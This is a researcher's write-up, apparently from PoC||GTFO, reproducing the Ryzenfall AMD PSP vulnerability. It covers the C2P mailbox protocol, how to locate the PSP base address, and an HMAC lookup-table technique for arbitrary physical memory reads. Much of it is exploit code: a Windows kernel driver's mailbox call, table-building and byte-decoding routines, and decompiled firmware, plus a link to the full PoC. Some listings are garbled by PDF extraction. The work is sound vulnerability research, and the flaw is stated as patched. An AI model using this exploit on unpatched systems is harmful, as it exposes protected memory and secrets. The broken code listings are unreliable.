## An Arbitrary Read Exploit for Ryzenfall 20:05

by David Kaplan

In March 2018, the friendly neighbours from CTS Labs, a little known company, dropped an announcement about some serious vulnerabilities in modern Ryzen-based AMD platforms, having given AMD prior notice only 24 hours before. Debates on the ethics of this disclosure aside, the technical cat is out of the bag. What better way to celebrate an arbitrary physical memory read vulnerability than by trying to reproduce CTS' findings on my Ryzen machine, and then documenting a PoC showing how to go about doing it yourself?

The Platform Security Processor on AMD platforms is responsible for, well, security stuff. It comes with some nifty features - like the aforementioned arbitrary read of physical memory, and arbitrary write for the enterprising reverse-engineer. It's totally not the main x86 64 processor and therefore there needs to be a way for the main processor, which runs your eDonkey server, to communicate with the PSP, which does your security stuff. A mailbox protocol is used for this chit-chat.

The vulnerability itself is straightforward. The PSP is powerful and has the ability to act on arbitrary physical memory. As such, privileged operations which result in arbitrary primitives should be gated to domains of trust that could act on this memory in any event; namely, SMM.

The PSP should validate that the physical address of the C2P mailbox CommandBuffer is situated in the SMM memory region, thereby disallowing the construction of the buffer in memory accessible by non-SMM CPL=0. In fact, a comment in five year old Coreboot source code from AMD<sup>13</sup> seems to indicate that this was the intention.<sup>14</sup>

- \* Notify the PSP that the system is
- completing the boot process. Upon
- receiving this command, the PSP will only
- honor commands where the buffer is in SMM space.
- \*

Luckily the CTS Labs folks didn't take this comment at face value and tried it out themselves. The found that it was possible to provide a non-SMM region buffer, giving us some sweet sweet primitives!

I like to start my PoC work with a list of tasks that I'll need to bring the PoC to successful fruition, then cross them off one-by-one. Often I change this list as the PoC implementation challenges my initial assumptions, but that's totally okay. For our work here, the list is something like the following:

- Find the implementation details of the mailbox protocol for communicating with the PSP.
- Find the location of the mailbox in memory.
- Discover useful commands that could be exploited for some interesting gain.
- Exploit!

## Finding the Mailbox Protocol

For my research here, I used the unpatched firmware for my GA-AX370-Gaming 5 motherboard. Cracking open AX370G5.F22 in UEFITool yields a plethora of DXE modules that may contain the necessary goodies. I'd encourage the enterprising hacker here to reverse a whole bunch of these as they contain much goodness.

Please note that the firmware contains both V1 and V2 versions of certain modules. On this particular platform, we're only interested in the V2 version, as the V2 C2P mailbox protocol that we're using is ever-so-slightly different from the V1 version. Take my word for it - I lost twenty hours of my life so that you don't have to!

Digging through a few of the DXE modules that communicate over C2P will give you the protocol. AmdPspSmmV2, AmdPspDxeV2, and AmdPspP2CmboxV2 are good places to start.

 $<sup>^{13} \</sup>tt src/soc/amd/common/block/psp/psp.c$ 

<sup>&</sup>lt;sup>14</sup>git clone https://github.com/coreboot/coreboot

Here's some neatened Hex-Rays spew:

```
mailbox_address = psp_base_address+0x10570;
if(get_psp_mailbox_status_recovery()==1) {
   return 0;
}
do {
   while (!_bittest(mailbox_address, 0x1Fu));
} while (*mailbox_address & 0xFF0000);
*(mailbox_address + 4) = buffer;
*mailbox_address = cmd << 16;
while (*mailbox_address & 0xFF0000);
```

Reading this code, we can learn quite a bit.

- The start of the mailbox is at offset 0x10570 from the psp\_base\_address.
- Before writing to the mailbox registers, one needs to wait for the interface to go ready (by testing the most significant bit at the start of this region) and making sure that the command byte is cleared
- The buffer at offset 0x4 points to the command buffer which holds parameters for the command (more on this later)
- To transact, the command is written to the third byte of the mailbox.
- The PSP is done when the cmd byte is cleared.

The mailbox registers can be represented by the following structure which will need to be populated and polled accordingly.

|   | <pre>typedef struct _PSP_CMD {</pre> |
|---|--------------------------------------|
| 2 | volatile BYTE SecondaryStatus;       |
|   | BYTE Unknown;                        |
| 4 | volatile BYTE Command;               |
|   | volatile BYTE Status;                |
| 6 | ULONG_PTR CommandBuffer;             |
|   | $PSP_CMD, *PPSP_CMD;$                |

It is important to note that the psp\_base\_address and buffers are physical addresses. To write to these locations from a Windows driver, we need to map the IO space accordingly to system virtual addresses. Performing the necessary mappings together with the control flow logic gives us the \_callPsp function on page 27.

So we now know enough of the mailbox protocol to implement it, but where in memory do we target the write? The PSP bar will be mapped somewhere in physical address space. It seems obvious that if a DXE module communicates with the PSP via the mailbox, it'd need to know the location of the PSP bar mapping. So off we go back to our trusty IDA to find more wonderful discoveries.

There seem to be two methods for discovering the base address.

The AmdPspSmmV2 module initializes the PSP bar if it has not already initialized by another module by allocating an MMIO region and writing it to some storage, as shown in get\_psp\_base\_with\_init() on page 28.

Of interest in get\_psp\_base\_with\_init() is the qword\_6D60 global. I haven't yet discovered exactly what this is, but an address of some sort is written to offset 0xB8 and the value being held by whatever storage (PCI bar? Possibly in the PSP itself?) appears at offset 0xBC. Writing to offset 0xBC has the effect of storing whatever value under that address.

So, in this instance, the low and high words of psp\_base\_address are stored at 0x13B102E0 and 0x13B102E0 respectively.

The location pointed to by qword\_6D60 seems to be hard coded and is perfectly accessible from the host OS. (If anyone knows exactly what this region is, please let me know as I'm too lazy to investigate further.)

| MEMORY[0xF80000B8] = 0x13B102E0; |
|----------------------------------|
| $psp\_base\_address =$           |
| MEMORY[0xF80000BC] & 0xFFF00000; |

The second method for locating the psp\_base\_address is via the 0xc00110a2 MSR. Coreboot uses this for locating the address, and so does my PoC. AmdPspDxeV2 seems to be responsible for writing this MSR, with the value pulled out by the first method:

| 1        | MEMORY[0 xF80000B8] = 0 x13B102E0;      |
|----------|-----------------------------------------|
|          | $psp\_base\_address = 0i64;$            |
| <b>3</b> | if (MEMORY[0xF80000BC] & 0xFFF00000 )   |
|          | $psp\_base\_address =$                  |
| <b>5</b> | MEMORY[0xF80000BC] & 0xFFF00000;        |
|          | writemsr(0xC00110A2, psp base address); |

To recap: at this point we know how to communicate with the PSP and we know where in physical memory to transact with the mailbox. We now need to discover something useful to do with this interface.

```
TATUS callPsp (_In_ ULONG Command, _In_ ULONG DataLength, _Inout_ BYTE *DataBuffer){

NTSTATUS status;

PHYSICAL_ADDRESS commandPa;

PPSP_CMD_commandVa = NULL;

PHYSICAL_ADDRESS commandBufferPa;

PPSP_CMD_BUFFER commandBufferVa;
NTSTATUS
      NT ASSERT(DataBuffer != NULL);
      goto end;
      }
      goto end;
      }
      // Ensure that the PSP is ready to receive commands. 
// TODO: test for HALT? bittest(commandVa, 30) status = waitOnPspReady([PVOID)&commandVa->Status); 
if (!PSP_SUCCESS(status)) goto end;
      status = waitOnPspCommandDone((PVOID)&commandVa->Command);
if (!PSP_SUCCESS(status)) goto end;
      // Construct the command and copy in the command buffer. The caller to this
// function supplies storage for the command buffer. This storage must be
// sizeof(PSP_CMD_BUFFER) - sizeof(BYTE*) greater than the contents of the
// buffer to allow for addition of the header.
      // buffer to allow for autitor of the following code is *very* important.
// NOTE: The ordering of the following code is *very* important.
// Note, also, the use of RtlMoveMemory to handle the overlapping
// source and destination buffers.
commandBufferVa = (PPSP_CMD_BUFFER) DataBuffer;
commandBufferPa = MmGetPhysicalAddress(commandBufferVa);
commandVa->CommandBuffer = commandBufferPa.QuadPart;
      RtlMoveMemory((PVOID)commandBufferVa->Data, DataBuffer, DataLength);
      // Setting the command byte calls into the PSP for processing. commandVa->Command = Command & 0\,xff\,;
      status = waitOnPspCommandDone((PVOID)&commandVa->Command);
if (!PSP_SUCCESS(status))
goto_end;
      goto end;
      }
      goto end;
      }
      // If control reaches here, the command has miraculously succeeded.
// Now strip the command buffer header and return to the caller.
RtlMoveMemory(DataBuffer, (PVOID)commandBufferVa->Data, DataLength);
       status = STATUS_SUCCESS;
end:
      if (NULL != commandVa) {
    MmUnmapIoSpace(commandVa, sizeof(PSP_CMD));
    commandVa = NULL;
      return status;
```

Example for Calling the PSP

```
char get_psp_base_with_init() {
     unsigned __int64 v0;
unsigned __int64 ret;
unsigned __int16 v2;
signed __int64 res;
\mathbf{2}
                                              rax
                                              rax
                                          // r8
 4
                                           // rax
6
                                          // rbx
        _int64 psp_base_address;
      signed
                  int64 v5;
                                              rdi
                                            / r8
      \__{int64v6};
8
      ___int64 qword_6D60_;
___int16 v9;
                                             rcx
10
                                              [rsp+40h] [rbp+8h]
                                          // [rsp+48h] [rbp+10h]
      {\bf int} \ {\tt psp\_base\_address\_}
                                  ;
                                          // [rsp+50h] [rbp+18h]
// [rsp+58h] [rbp+20h]
      __int64 psp_base_address_;
12
      __int64 v12;
14
      v0 = \_readmsr(0x1Bu);
      \texttt{ret} = (((\texttt{unsigned \__int64})\texttt{HIDWORD}(\texttt{v0}) << 32) | (\texttt{unsigned int})\texttt{v0}) >> 8;
16
      if ( ret & 1 ) {
        LOBYTE(ret) = get_psp_base((unsigned int *)&psp_base_address_);
18
         if ( !(_BYTE) ret ) {
           20
22
           v12 \ = \ 0 \, x \, 1 \, 0 \, 0 \, 0 \, 0 \, i \, 6 \, 4 \; ;
           LOBYTE(v9) = v9 \& 0x38 | 3;
           res = psp_allocate_mmio(\&psp_base_address_, (unsigned __int64 *)\&v12, v2, \&v9);
24
           psp_base_address = psp_base_address_;
26
           v5 = res;
           if ( res && (sub_16D8(0x20300593u), v5 < 0) )
28
              log(0x8000000i64, aPspbarinitearl, v6);
            else
              \log\left(0\,x8000000i64\;,\;\;aPspbarinitearl\_0\;,\;\;psp\_base\_address\right);
30
           qword_6D60 = qword_6D60;
           *(DWORD * \overline{)}(qword_6\overline{D}60 + 0xB8) = 0x13B102E0;
32
           *(DWORD *)(qword_6D60_ + 0xBC) = psp_base_address | 0x101;
34
           LOBYTE(ret) = 0xE4u;
           \begin{array}{l} *(\_DWORD *)(qword\_6D60\_ + 0xB8) = 0x13B102E4; \\ *(\_DWORD *)(qword\_6D60\_ + 0xBC) = HIDWORD(psp\_base\_address); \end{array}
36
        }
38
      }
      return ret;
40
   }
```





## Arbitrary Read

The method I'm going to describe for arbitrary physical memory read is the same that the CTS Labs folks used in their BlueHatIL '19 presentation. There are many interesting C2P commands to discover and some can be abused in all sorts of interesting ways.

The command we're interested in is found in AmdMemS3CzDxe. The lazy engineer that I am, I only partially reverse engineered this module to be able to implement the arbitrary read. Therefore, I made some assumptions that might differ from the facts.

It seems to me that when the machine enters S3, certain values are read from the PCD interface. A structure built to hold this data is sent to the PSP via a mailbox transaction.<sup>15</sup> The PSP will calculate and return an HMAC on this data using some internal secret key. The now-integrity-protected data structure will presumably then be saved somewhere via some SMM module.<sup>16</sup> I assume that on resume-from-S3 this structure will be retrieved from storage, verified and written back to where it came from, but I haven't dug into that much. It might be an interesting area for further research.

The somewhat dirty decompiled function on page 30 performs the work. I've tried to neaten it up a little by hand.

We can ignore the whole SMM bit; the only part that interests us is how the MBOX\_BIOS\_CMD\_S3\_-DATA\_INFO mailbox command is built.

If we recall from our discussion of the PSP\_CMD structure, the mailbox command consists of a single byte command. In this instance the value 8 for MBOX\_BIOS\_CMD\_S3\_DATA\_INFO and a pointer to a CommandBuffer.<sup>17</sup>

From the decompiled logic on page 30, we can see the format of the command header.

| 1 | <pre>typedef struct _PSP_CMD_BUFFER {</pre> |
|---|---------------------------------------------|
|   | ULONG Size;                                 |
| 3 | volatile ULONG Status;                      |
|   | <b>volatile</b> BYTE Data[ANYSIZE_ARRAY];   |
| 5 | } PSP_CMD_BUFFER, *PPSP_CMD_BUFFER;         |

While the header is common to all mailbox commands, each one has its own parameters. In the specific case of command 8, the parameters look like this.

| 1 | <pre>typedef struct _PSP_DATA_INFO_BUFFER {</pre> |
|---|---------------------------------------------------|
|   | ULONG_PTR PhysicalAddress;                        |
| 3 | $SIZE_T$ Size;                                    |
|   | BYTE Hmac [HMAC_LEN];                             |
| 5 | }PSP_DATA_INFO_BUFFER, *PPSP_DATA_INFO_BUFFER     |
|   | ;                                                 |

We now know how to transact MBOX\_BIOS\_CMD\_-S3\_DATA\_INFO with the PSP. How do we abuse this for arbitrary read?

Well, we have a primitive that takes any physical address and returns the HMAC of that address. We can abuse this primitive to construct a table of all HMAC values for all possible values of a single byte. (See page 31.)

Having constructed this table, we now have an arbitrary read primitive from physical memory. To read any address, we can simply point this same logic (MBOX\_BIOS\_CMD\_S3\_DATA\_INFO) at any location in physical memory, dumping each byte by first asking the PSP to calculate an HMAC on the byte for us and then looking up that byte value in our HMAC lookup table, as shown on page 31.

AMD fixed this particular vulnerability in AGESA 1.0.0.4. On my particular Gigabyte platform, any firmware prior to F23 is vulnerable.

An enterprising hacker seeking further research might look for an arbitrary write primitive, even though publishing working code for it might be a bit irresponsible. It might also be worthwhile to test AMD's fix - perhaps it's possible to trigger SMM to communicate with the PSP, then race the "is command buffer in SMM" check? (And is such a check how AMD fixed the issue? Reverse engineering the PSP could answer this question.)

Before signing off, I'd like to thank @idolion\_ and @uri\_farkas, who first discovered this vulnerability, for their help with some hints when I initially got stuck trying to reproduce their work here.

I hope you enjoyed this little dive into the AMD PSP C2P mailbox. Full PoC code for Windows 10 is available.<sup>18</sup> Platform firmware is full of all sorts of goodies and is a great area for discovering powerful primitives.

<sup>16</sup>It is sent over the EFI\_SMM\_COMMUNICATION\_PROTOCOL.

<sup>&</sup>lt;sup>15</sup>Specifically command 8, MBOX\_BIOS\_CMD\_S3\_DATA\_INFO.

 $<sup>^{17}</sup>$ This must be a pointer to a *physical* memory address. Any virtual address used in the PoC must be converted to its physical address for the PSP as it, naturally, has no concept of x86 virtual memory.

<sup>&</sup>lt;sup>18</sup>git clone https://github.com/depletionmode/ryzenfallen; unzip pocorgtfo20.pdf ryzenfallen.zip

```
int64
               fastcall Hmac_address_range_via_psp_and_save(__int64 Length, __int64 Address) {
     __int64 length;
2
                                                    rsi
     __int64 address;
                                                   rbp
     ___int64 buffer0_ptr;
4
                                                   rbx
       int64 poolBuffer ;
                                                    rdi
     EFI_BOOT_SERVICES *g_EfiBootServices;
6
                                                 // rax
     __int64 status;
                                                 // rax
     __int64 (__fastcall **smmCommunicationProtocolInterface)(_QWORD, __int64, __int64 *);//r9
8
     ____int64 result;
                                                 // rax
                                                 // rax
10
       int64 v10;
     char hmac[32];
                                                   [rsp+30h] [rbp-D8h]
    char v12;

PSP_DATA_INFO_CMD_BUFFER commandBuffer; // [rsp+50h] [rbp-B8h]

int64_realBuffer
12
                                                 // [rsp+110h] [rbp+8h]
14
     __int64 poolBuffer;
     {\tt length} \; = \; {\tt Length} \, ;
16
     address = Address;
     commandBuffer.Header.Size = 0x38;
18
     commandBuffer.Buffer.PhysicalAddress = address;
     commandBuffer.Buffer.Size = length;
20
     bzero(&commandBuffer.Buffer.Hmac, 32);
     do psp __MBOX_BIOS_CMD_S3_DATA_INFO((unsigned __int64)&commandBuffer & 0
22
       xFFFFFFFFFFFFFFFE0ui64);
     if ( hmac != commandBuffer.Buffer.Hmac )
       memcpy__(hmac, commandBuffer.Buffer.Hmac,0x20ui64);
24
     ::g_EfiBootServices->AllocatePool(4i64, length + 32, &poolBuffer);
::g_EfiBootServices->SetMem(poolBuffer, length + 32, 0i64);
26
     ::g_EfiBootServices->CopyMem(poolBuffer, address, length);
28
     ::g EfiBootServices->CopyMem(length + poolBuffer, hmac, 32i64);
     buffer0_ptr = g_Buffer0;
30
     poolBuffer = poolBuffer;
     ::g_EfiBootServices->CopyMem(g_Buffer0, &g_Guid0, 16i64);
32
     g_EfiBootServices = :: g_EfiBootServices;
     *(QWORD *)(buffer0 ptr + 16) = 0x3000i64;
     g_EfiBootServices->CopyMem(buffer0_ptr + 0x18, poolBuffer_);
34
     status = ::g_EfiBootServices->LocateProtocol)(
36
                 &g_EFI_SMM_COMMUNICATION_PROTOCOL_GUID,
                 0i64.
38
                 &g SmmCommunicationProtocolInterface);
     smmCommunicationProtocolInterface\ =\ g\_SmmCommunicationProtocolInterface;
40
     if (status < 0)
       smmCommunicationProtocolInterface = 0i64;
42
       SmmCommunicationProtocolInterface = smmCommunicationProtocolInterface;
     if ( !smmCommunicationProtocolInterface
          || (result = (*smmCommunicationProtocolInterface)(smmCommunicationProtocolInterface,
44
                                                                            g_Buffer0, &qword_16E10))
46
        ) {
       result = ::g_EfiBootServices->FreePool)(poolBuffer );
48
       if ( result \geq 0 ) {
         v10 = g_EfiRuntimeServices \rightarrow SetVariable)(
50
                  aMemorys3savenv,
                  &g VendorGuid,
52
                  3i64,
                  length ,
54
                  address);
         result = v10 != 0 ? (unsigned int)v10 : 0;
56
       }
     }
58
     return result;
```

Finding the HMAC Address Range

```
1 NTSTATUS _populateHmacLookupTable (BYTE Table [][HMAC_LEN]) {
       NTSTATUS status;
3
       ULONG idx;
      PHYSICAL ADDRESS storagePa;
5
      NT ASSERT(Table != NULL);
\overline{7}
       /* Build the HMAC lookup table needed for decoding by incrementing a byte at a known
       * location (using the stack address of the loop idx), reading it via the relevant
9
        * PSP function and storing the resultant HMAC value.
11
        */
13
       storagePa = MmGetPhysicalAddress(&idx);
15
       for (idx = 0; idx < 0x100; idx++) {
           // Ask the PSP to calculate the HMAC
           status = readPaByteViaPsp(storagePa, Table[idx]);
17
           if (!PSP_SUCCESS(status))
               goto end;
19
       }
21
       status = STATUS SUCCESS;
23 end:
       return status;
25 }
```

Populates a Lookup Table of CMAC Hashes

```
decodeByte (_In_ BYTE Hmac[HMAC_LEN], _Out_ BYTE *Byte) {
  NTSTATUS
 1
       NTSTATUS status;
3
       PPSP DRV CONTEXT context;
       NT ASSERT(Hmac != NULL);
5
       NT_ASSERT(Byte != NULL);
7
       PAGED_CODE();
9
       context = WdfObjectGetTypedContext(g Device, PSP DRV CONTEXT);
11
       // This is a nasty O(n) lookup. A hashtable would be a better option.
13
       for (ULONG idx = 0; idx < 0x100; idx++) {
            if (HMAC_LEN == RtlCompareMemory(Hmac,
15
                                                 context->HmacLookupTable[idx],
                                                 HMAC_LEN)) {
17
                *Byte = idx \& 0xff;
                status = STATUS_SUCCESS;
19
                goto end;
21
            }
       }
23
       // Control reaching here means that the lookup failed. status = \rm STATUS\_NOT\_FOUND;
25
   \operatorname{end}:
27
       return status;
   }
```

Function to Decode Exfiltrated Bytes